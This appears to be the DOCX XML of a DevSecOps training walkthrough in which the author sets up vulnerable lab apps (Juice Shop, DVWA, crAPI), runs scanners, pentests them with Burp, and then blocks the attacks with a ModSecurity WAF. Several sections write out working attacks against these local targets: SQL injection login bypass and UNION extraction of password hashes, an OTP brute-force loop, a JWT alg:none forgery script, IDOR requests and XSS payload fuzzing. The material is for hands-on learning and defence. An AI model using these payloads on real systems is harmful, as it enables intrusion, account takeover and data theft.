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0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="60"/>
        </w:rPr>
        <w:t>DevSecOps &amp; AI Security Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Complete Hands-On Walkthrough — Modules 1 through 4.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Every command · every script · every roadblock and fix · scripts reference appendix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="7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E75B6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M1</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="E8E8E8"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Infrastructure</w:t>
              <w:br/>
              <w:t>Docker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E7D32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M2</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="E8E8E8"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>SAST &amp; SCA</w:t>
              <w:br/>
              <w:t>Bandit/Semgrep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6A1E8A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M3</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="E8E8E8"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>DAST</w:t>
              <w:br/>
              <w:t>OWASP ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000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M3.5</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="E8E8E8"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>API Security</w:t>
              <w:br/>
              <w:t>crAPI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7B3F00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M4</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="E8E8E8"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Pentest</w:t>
              <w:br/>
              <w:t>Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F6B75"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:bottom w:w="12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M4.5</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="E8E8E8"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>WAF/RASP</w:t>
              <w:br/>
              <w:t>ModSecurity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Repo: https://github.com/akhil65/DSO  |  Last updated: 2026-03-16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How to Use This Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Literal record of every command, error, and fix from building this DevSecOps lab from scratch.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2EFDA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375623"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Prerequisites:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>macOS with Homebrew · Docker Desktop · Python 3 · Git · GitHub account · Burp Suite Community Edition · Firefox · 8 GB RAM minimum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Module 1 — Infrastructure &amp; Lab Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>1.1  Clone and Create Directory Structure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git clone https://github.com/akhil65/DSO.git</w:t>
        <w:br/>
        <w:t>cd "DSO essentials"</w:t>
        <w:br/>
        <w:t>mkdir -p devsecops-lab/{module-1-infrastructure,module-2-sast,module-3-dast,docs}</w:t>
        <w:br/>
        <w:t>cd devsecops-lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>1.2  Start Juice Shop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run -d -p 3000:3000 --name juice-shop bkimminich/juice-shop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Open http://localhost:3000 — you should see the Juice Shop storefront.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>1.3  Start DVWA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run -d -p 8080:80 --name dvwa vulnerables/web-dvwa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Open http://localhost:8080. Credentials: admin / password. Click 'Create / Reset Database'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>1.4  Admin Login via SQL Injection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Email:    ' OR 1=1--</w:t>
        <w:br/>
        <w:t>Password: anything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Logged in as admin@juice-sh.op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docker-compose vs docker compose:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Newer Docker Desktop uses 'docker compose' (space). Update to v4.0+ if you see 'command not found'.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D32"/>
        </w:rPr>
        <w:t>Module 2 — SAST &amp; SCA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>2.1  Install Tools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pip install bandit --break-system-packages</w:t>
        <w:br/>
        <w:t>pip install semgrep --break-system-packages</w:t>
        <w:br/>
        <w:t>brew install trivy</w:t>
        <w:br/>
        <w:t>brew install osv-scanner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>2.2  Run Bandit (Python SAST)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bandit -r . -f json -o bandit-report.json</w:t>
        <w:br/>
        <w:t>bandit -r . -f txt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Total issues: 29  (High: 8, Medium: 14, Low: 7)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>2.3  Run Semgrep (Multi-language SAST)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semgrep --config=auto . --json -o semgrep-report.json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Found 43 findings across 12 files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>2.4  Run Trivy (Container SCA)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trivy fs --scanners vuln .</w:t>
        <w:br/>
        <w:t>trivy image bkimminich/juice-shop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Total: 43 (CRITICAL: 5, HIGH: 18). Secrets detected: 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>2.5  Run OSV Scanner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osv-scanner -r .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Found 50 vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>2.6  Git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git add fails with 'pathspec did not match':  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>cd to repo root ('DSO essentials/') first. Read exact paths from git status.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pP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"DSO essentials"</w:t>
        <w:br/>
        <w:t>git add devsecops-lab/docs/</w:t>
        <w:br/>
        <w:t>git commit -m 'Module 2: SAST/SCA reports'</w:t>
        <w:br/>
        <w:t>git push origin main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6A1E8A"/>
        </w:rPr>
        <w:t>Module 3 — DAST (OWASP ZAP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.1  Install ZAP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brew install --cask owasp-zap</w:t>
        <w:br/>
        <w:t>brew install --cask firefox</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.2  ZAP Baseline Scan (Docker)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localhost unreachable inside Docker (macOS):  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Use host.docker.internal:3000 instead of localhost:3000.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pP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mkdir -p /tmp/zap-reports</w:t>
        <w:br/>
        <w:t>docker run --rm -v /tmp/zap-reports:/zap/wrk:rw \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ghcr.io/zaproxy/zaproxy:stable zap-baseline.py \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -t http://host.docker.internal:3000 -r zap-baseline-report.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.3  ZAP Full Active Scan — GUI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Docker full scan crashes on Apple Silicon:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Use ZAP GUI natively — DomXSS scanner requires headless Firefox which crashes on arm64.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Open ZAP GUI → Quick Start → paste http://localhost:3000 → Automated Scan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Select Standard Scan (not Ajax)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Wait ~15 min. Report → Generate Report → HTML → save to module-3-dast/zap-reports/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C00000"/>
        </w:rPr>
        <w:t>Module 3.5 — API Security (OWASP API Top 10)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.5.1  Deploy crAPI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module-3.5-api-security</w:t>
        <w:br/>
        <w:t>curl -o docker-compose.yml \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  https://raw.githubusercontent.com/OWASP/crAPI/main/deploy/docker/docker-compose.yml</w:t>
        <w:br/>
        <w:t>docker compose pull &amp;&amp; docker compose up -d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UI: http://localhost:8888  |  Mailhog: http://localhost:8025</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.5.2  Get Bearer Token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-X POST http://localhost:8888/identity/api/auth/login \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -H 'Content-Type: application/json' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d '{"email":"admin@admin.com","password":"YourPassword"}' | python3 -m json.tool</w:t>
        <w:br/>
        <w:t>export TOKEN1="eyJhbG..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.5.3  Exercise 1 — BOLA (API1:2023)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"http://localhost:8888/identity/api/v2/vehicle/&lt;UUID&gt;/location" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -H "Authorization: Bearer $TOKEN2"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"admin@admin.com", "vehicleLocation": {"latitude": "37.4"}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404 Not Found:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Wrong path. Use /identity/api/v2/vehicle/{uuid}/location.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3.5.4  Exercise 2 — OTP Brute Force (API4+API9:2023)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for otp in $(seq -w 0000 9999); do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  result=$(curl -s -X POST http://localhost:8888/identity/api/auth/v2/check-otp \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    -H 'Content-Type: application/json' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    -d "{\"email\":\"admin@admin.com\",\"otp\":\"$otp\",\"password\":\"NewPassword@1\"}")</w:t>
        <w:br/>
        <w:t xml:space="preserve">  echo "$result" | grep -q 'Invalid OTP' || { echo "HIT: OTP=$otp"; break; }</w:t>
        <w:br/>
        <w:t>done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HIT: OTP=0009</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.5.5  Exercise 3 — JWT alg:none Bypass (API2:2023)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TOKEN=$(python3 -c "</w:t>
        <w:br/>
        <w:t>import json, base64</w:t>
        <w:br/>
        <w:t>def b64u(d):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if isinstance(d,str): d=d.encode()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return base64.urlsafe_b64encode(d).rstrip(b'=').decode()</w:t>
        <w:br/>
        <w:t>h=json.dumps({'alg':'none'},separators=(',',':'))</w:t>
        <w:br/>
        <w:t>p=json.dumps({'sub':'admin@admin.com','iat':1773607237,'exp':1774212037,'role':'user'},separators=(',',':'))</w:t>
        <w:br/>
        <w:t>print(f'{b64u(h)}.{b64u(p)}.')</w:t>
        <w:br/>
        <w:t>")</w:t>
        <w:br/>
        <w:t>curl -s http://localhost:8888/identity/api/v2/user/dashboard \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -H "Authorization: Bearer $TOKEN"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"admin@admin.com" }  &lt;- victim's data returned with forged token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.5.6  Exercise 4 — Excessive Data Exposure (API3:2023)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'http://localhost:8888/community/api/v2/community/posts/recent' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -H "Authorization: Bearer $TOKEN" | python3 -m json.tool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{ "email": "robot001@example.com", "vehicleid": "4bae9968..." }  &lt;- not shown in UI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7B3F00"/>
        </w:rPr>
        <w:t>Module 4 — Manual Penetration Testing (Burp Suite)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>4.1  Exercise 1 — Proxy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Burp Suite → Proxy → Options → listener on 127.0.0.1:8080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Firefox → Settings → Network Settings → Manual proxy: 127.0.0.1:8080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Clear 'No proxy for:' field completely — remove localhost and 127.0.0.1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4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Burp → Proxy → Intercept → toggle to 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5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Navigate to http://localhost:3000 in Firefox — Burp freezes the page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Firefox not intercepting localhost:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Firefox has built-in proxy bypass for localhost. Remove localhost and 127.0.0.1 from the 'No proxy for:' field.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4.2  Exercise 2 — SQLi Authentication Bypass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POST /rest/user/login HTTP/1.1</w:t>
        <w:br/>
        <w:t>Host: localhost:3000</w:t>
        <w:br/>
        <w:t>Content-Type: application/json</w:t>
        <w:br/>
        <w:br/>
        <w:t>{"email":"' OR 1=1--","password":"anything"}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"token": "eyJ0eX...", "umail": "admin@juice-sh.op"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408 Request Timeout:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HTTP/1.1 requires blank line after last header. Press Enter twice after Content-Type in Repeater.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4.3  Exercise 3 — UNION Data Extraction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GET /rest/products/search?q='))UNION SELECT id,email,password,'4','5','6','7','8','9' FROM Users-- HTTP/1.1</w:t>
        <w:br/>
        <w:t>Host: localhost:3000</w:t>
        <w:br/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admin@juice-sh.op: 0192023a7bbd73250516f069df18b500 ... (22 users) }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>4.4  Exercise 4 — Stored XSS with Burp Intruder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Get XSS wordlist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-o ~/XSS-payloads.txt \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/XSS/robot-friendly/XSS-Jhaddix.txt'</w:t>
        <w:br/>
        <w:t>wc -l ~/XSS-payloads.txt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curl returns 14 bytes (404):  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SecLists moved the file to Fuzzing/XSS/robot-friendly/XSS-Jhaddix.txt — use full path above.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color w:val="404040"/>
        </w:rPr>
        <w:t>Confirm endpoint in Repeater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PUT /rest/products/1/reviews HTTP/1.1</w:t>
        <w:br/>
        <w:t>Host: localhost:3000</w:t>
        <w:br/>
        <w:t>Authorization: Bearer &lt;token&gt;</w:t>
        <w:br/>
        <w:t>Content-Type: application/json</w:t>
        <w:br/>
        <w:br/>
        <w:t>{"message":"test","author":"admin@juice-sh.op"}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HTTP/1.1 201 Created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500 Internal Server Error:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Use PUT not POST for the reviews endpoint.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Fuzz with Intruder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68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1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Right-click request in Repeater → Send to Intruder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2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Intruder → Positions → Clear § → highlight 'test' → Add §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3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Intruder → Payloads → Load → ~/XSS-payloads.txt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4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FFFFF"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Fix Target: change http://localhost:80 to http://localhost:3000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D6E4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2E75B6"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>5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  <w:shd w:val="clear" w:color="auto" w:fill="F9FBFD"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Start Attack — all ~3000 payloads return 201 (server stores raw HTML)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>4.5  Exercise 5 — IDOR: Basket Access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Burp Repeater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GET /rest/basket/2 HTTP/1.1</w:t>
        <w:br/>
        <w:t>Host: localhost:3000</w:t>
        <w:br/>
        <w:t>Authorization: Bearer &lt;token&gt;</w:t>
        <w:br/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HTTP/1.1 200 OK</w:t>
        <w:br/>
        <w:t>{ "UserId": 2, "Products": [ Raspberry Juice x2 ] }  &lt;- accessed as admin (UserId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401 Unauthorized: invalid signature:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>JWT expired. Re-run the login request to get a fresh token.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1F6B75"/>
        </w:rPr>
        <w:t>Module 4.5 — WAF &amp; RASP (ModSecurity CRS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Deploy OWASP ModSecurity CRS as a WAF in front of Juice Shop to block the attacks from Module 4. ModSecurity runs inside a Docker container as an nginx reverse proxy — no manual installation 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1F6B75"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">WAF vs RASP:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>WAF (ModSecurity) sits OUTSIDE the app as a reverse proxy — inspects raw HTTP. RASP (OpenRASP) runs INSIDE the app runtime — sees decoded data at function call level. WAF = bouncer at the door. RASP = security guard inside the building. Both are needed.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4.5.1  Create docker-compose.yml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cd module-4.5-rasp</w:t>
        <w:br/>
        <w:t>cat &gt; docker-compose.yml &lt;&lt; 'EOF'</w:t>
        <w:br/>
        <w:t>services:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  waf:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: owasp/modsecurity-crs:nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - "3001:8080"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    environment:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - BACKEND=http://host.docker.internal:3000</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - PORT=8080</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - MODSEC_RULE_ENGINE=On</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - BLOCKING_PARANOIA=1</w:t>
        <w:br/>
        <w:t>EOF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0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1F6B75"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Why no install step?  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>The Docker image owasp/modsecurity-crs:nginx bundles nginx + ModSecurity v3 + 927 OWASP CRS rules. Docker pulls and runs everything — this is DevSecOps: security tooling containerised and reproducible.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4.5.2  Start the WAF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compose up -d</w:t>
        <w:br/>
        <w:t>docker compose ps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module-45-rasp-waf-1   owasp/modsecurity-crs:nginx   Up (healthy)   0.0.0.0:3001-&gt;8080/tcp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4D6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r>
              <w:rPr>
                <w:b/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ROADBLOCK — port 3000 already allocated:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>The docker-compose originally included a second Juice Shop on 3000. Remove the juice-shop service and point BACKEND to host.docker.internal:3000 (the already-running container from Module 1).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>4.5.3  Verify Proxy is Working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curl -s http://localhost:3001 | head -5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&lt;!doctype html&gt;&lt;html lang="en"...  &lt;- Juice Shop HTML served through WAF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>4.5.4  Test WAF Blocking — SQLi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# Via WAF (should be blocked)</w:t>
        <w:br/>
        <w:t>curl -s -o /dev/null -w "%{http_code}" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "http://localhost:3001/rest/products/search?q=UNION+SELECT+email+FROM+Users--"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Direct to Juice Shop (should pass)</w:t>
        <w:br/>
        <w:t>curl -s -o /dev/null -w "%{http_code}" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "http://localhost:3000/rest/products/search?q=UNION+SELECT+email+FROM+Users--"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Via WAF:    403</w:t>
        <w:br/>
        <w:t>Direct:     200  &lt;- same attack, WAF is the only difference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>4.5.5  Test WAF Blocking — XSS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# Raw XSS tag</w:t>
        <w:br/>
        <w:t>curl -s -o /dev/null -w "%{http_code}" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "http://localhost:3001/rest/products/search?q=&lt;script&gt;alert(1)&lt;/script&gt;"</w:t>
        <w:br/>
        <w:br/>
        <w:t># URL-encoded XSS</w:t>
        <w:br/>
        <w:t>curl -s -o /dev/null -w "%{http_code}" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "http://localhost:3001/rest/products/search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E"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403</w:t>
        <w:br/>
        <w:t>403  &lt;- WAF decodes URL-encoding before matching — both blocked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
